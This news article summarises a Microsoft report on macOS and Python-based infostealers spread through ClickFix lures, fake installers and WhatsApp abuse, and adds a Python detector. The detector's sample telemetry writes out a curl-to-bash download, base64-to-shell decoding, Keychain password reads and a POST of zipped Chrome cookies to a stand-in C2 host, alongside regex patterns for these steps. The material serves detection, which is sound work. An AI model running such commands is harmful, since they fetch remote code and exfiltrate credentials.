Microsoft warns info-stealing attacks are expanding from Windows to macOS, using cross-platform languages like Python and abusing trusted platforms.
Since late 2025, Microsoft has seen a surge in macOS infostealer attacks using social engineering, fake fixes, and malicious DMG files. Attackers deploy macOS-specific and Python-based stealers, abuse trusted apps like WhatsApp, and use native tools to steal credentials, crypto, and session data while evading defenses.
“Since late 2025, Microsoft Defender Experts has observed macOS-targeted infostealer campaigns using social engineering techniques—including ClickFix-style prompts and malicious DMG installers—to deploy macOS-specific infostealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS),” reads the report published by Microsoft.
“These campaigns leverage fileless execution, native macOS utilities, and AppleScript automation to harvest credentials, session data, secrets from browsers, keychains, and developer environments.”
Attackers are increasingly targeting Mac users and organizations with information-stealing malware using tricks that look legitimate and familiar.
Mac users are lured to fake websites, often via Google Ads, that push fake software or ask them to paste commands into Terminal. These scams install stealers like DigitStealer, MacSync, and Atomic Stealer, which quietly grab browser passwords, crypto wallets, and developer credentials, then erase traces. This can lead to account takeovers, financial theft, and access to company systems.
At the same time, phishing emails are spreading Python-based stealers because they’re easy to build and hard to detect. Malware like PXA Stealer steals logins, financial data, and browser sessions, often using Telegram and trusted tools to hide activity.
Attackers are also abusing trusted platforms like WhatsApp and PDF tools to spread malware, turning normal apps into delivery channels for credential and crypto theft.
In November 2025, Microsoft observed a WhatsApp abuse campaign that spread Eternidade Stealer through a multi-stage, worm-like infection chain. The attack starts with an obfuscated VB script that launches PowerShell to fetch payloads. A Python component hijacks WhatsApp accounts to message all contacts with malicious files, while a malicious MSI installs Eternidade Stealer to steal banking, payment, and cryptocurrency credentials.
In September 2025, Microsoft uncovered a fake “Crystal PDF” editor spread via Google Ads and SEO poisoning. Once installed, it persists via scheduled tasks and steals browser cookies, sessions, and credentials from Chrome and Firefox.
Microsoft recommends a layered defense to stop macOS, Python-based, and platform-abuse infostealers. Train users to spot fake ads, bogus installers, and ClickFix copy-paste tricks, and avoid unsigned DMGs or “terminal fixes.” Monitor macOS for risky Terminal activity like curl, Base64 decoding, AppleScript, and fileless execution chains. Watch for unusual access to Keychain, browser credentials, cloud keys, and crypto wallets.
Inspect outbound traffic for POST requests to new or suspicious domains and for short-lived ZIP files created in temp folders before data exfiltration. Block known command-and-control servers using threat intelligence. Strengthen defenses against Python and LOLBIN abuse, including certutil misuse, AutoIt activity, and process hollowing.
Enable cloud-delivered protection, EDR in block mode, network and web protection, SmartScreen, automated investigation, and tamper protection. Apply attack surface reduction rules to block obfuscated scripts, untrusted executables, and scripts launching downloaded payloads.
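The monitoring advice above (risky Terminal activity such as curl piped into a shell, Base64 decoding, AppleScript, Keychain access, short-lived ZIP files in temp folders and POST requests to unfamiliar domains) can be turned into a simple chain detector. The following is an added illustration written for this article, not code from Microsoft's report or from any of the stealers it names. The event format, the `.invalid` domains, the user names and the 10-minute correlation window are all constructed assumptions; a real deployment would read process-execution telemetry from an EDR or from the macOS Endpoint Security framework instead.

```python
"""Toy detector for the macOS infostealer execution chains described above.

Input lines use a constructed key=value format (hypothetical, not an EDR schema):
    <ISO-8601 timestamp> user=<name> parent=<process> cmd="<command line>"
"""
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed sample telemetry. The jdoe session mimics a ClickFix-style chain;
# the admin lines are ordinary activity that should not be flagged.
SAMPLE_EVENTS = [
    '2025-11-03T10:12:01Z user=jdoe parent=Terminal cmd="curl -fsSL https://updates.example.invalid/fix.sh | bash"',
    '2025-11-03T10:12:02Z user=jdoe parent=bash cmd="echo aGVsbG8= | base64 -d | sh"',
    '2025-11-03T10:12:03Z user=jdoe parent=sh cmd="osascript /tmp/helper.scpt"',
    '2025-11-03T10:12:04Z user=jdoe parent=sh cmd="security find-generic-password -a Chrome"',
    '2025-11-03T10:12:05Z user=jdoe parent=sh cmd="zip -r /tmp/out.zip /Users/jdoe/Library/Application Support/Google/Chrome/Default/Cookies"',
    '2025-11-03T10:12:06Z user=jdoe parent=sh cmd="curl -X POST -F data=@/tmp/out.zip https://c2.example.invalid/upload"',
    '2025-11-03T11:00:00Z user=admin parent=Terminal cmd="brew update"',
    '2025-11-03T11:00:10Z user=admin parent=Terminal cmd="curl -sI https://example.com"',
]

# Each rule is one of the behaviours the article tells defenders to watch for.
# A bare curl is deliberately NOT a rule: on its own it is far too noisy.
RULES = [
    ("remote_script_to_shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
    ("base64_decode_to_shell", re.compile(r"\bbase64\b\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b")),
    ("applescript_exec", re.compile(r"\bosascript\b")),
    ("keychain_access", re.compile(r"\bsecurity\s+(find-generic-password|find-internet-password|dump-keychain)\b")),
    ("archive_in_temp", re.compile(r"^\s*(zip|tar|ditto)\b.*(/tmp/|/private/tmp/|/var/folders/|\$TMPDIR)")),
    ("http_post", re.compile(r"\bcurl\b.*(\s-X\s*POST\b|\s(-d|-F|--data(-\w+)?|--form)\b)")),
]

EVENT_RE = re.compile(r'^(?P<ts>\S+)\s+user=(?P<user>\S+)\s+parent=(?P<parent>\S+)\s+cmd="(?P<cmd>.*)"$')


@dataclass
class Event:
    ts: datetime
    user: str
    parent: str
    cmd: str


def parse_event(line: str):
    """Parse one constructed-format line; return None for lines that do not match."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.fromisoformat(m.group("ts").replace("Z", "+00:00"))
    return Event(ts, m.group("user"), m.group("parent"), m.group("cmd"))


def match_rules(cmd: str) -> list:
    """Return the names of every rule the command line triggers, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmd)]


def severity(rules: set) -> str:
    """Outbound POST combined with credential or staging activity is the strongest signal."""
    if "http_post" in rules and rules & {"keychain_access", "archive_in_temp"}:
        return "high"
    if len(rules) >= 2:
        return "medium"
    return "low"


def find_chains(lines, window_seconds: int = 600) -> list:
    """Group rule hits per user into chains; a gap longer than the window starts a new chain."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        rules = match_rules(ev.cmd)
        if rules:
            hits.append((ev, rules))
    hits.sort(key=lambda h: (h[0].user, h[0].ts))

    chains = []
    current = None
    for ev, rules in hits:
        new_chain = (
            current is None
            or current["user"] != ev.user
            or (ev.ts - current["end"]).total_seconds() > window_seconds
        )
        if new_chain:
            current = {"user": ev.user, "start": ev.ts, "end": ev.ts, "rules": set(), "commands": []}
            chains.append(current)
        current["end"] = ev.ts
        current["rules"].update(rules)
        current["commands"].append(ev.cmd)

    for chain in chains:
        chain["severity"] = severity(chain["rules"])
    return chains


if __name__ == "__main__":
    for chain in find_chains(SAMPLE_EVENTS):
        print(f"[{chain['severity']}] user={chain['user']} "
              f"{chain['start'].time()}–{chain['end'].time()} rules={sorted(chain['rules'])}")
```

Run against the constructed sample, the jdoe session is reported as a single high-severity chain because a POST to a new domain follows Keychain access and a ZIP staged in /tmp, while the admin lines produce no hits at all. The per-rule thresholds and the correlation window are assumptions to tune against your own baseline; the value of the approach is in correlating several individually weak signals within one user session rather than alerting on any one of them.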
“Due to the growing threat of Python-based infostealers, it is important that organizations protect their environment by being aware of the tactics, techniques, and procedures used by the threat actors who deploy this type of malware,” Microsoft concludes. “Being compromised by infostealers can lead to data breaches, unauthorized access to internal systems, business email compromise (BEC), supply chain attacks, and ransomware attacks.”
Source: SecurityAffairs
Source Link: https://securityaffairs.com/187608/security/microsoft-info-stealing-malware-expands-from-windows-to-macos.html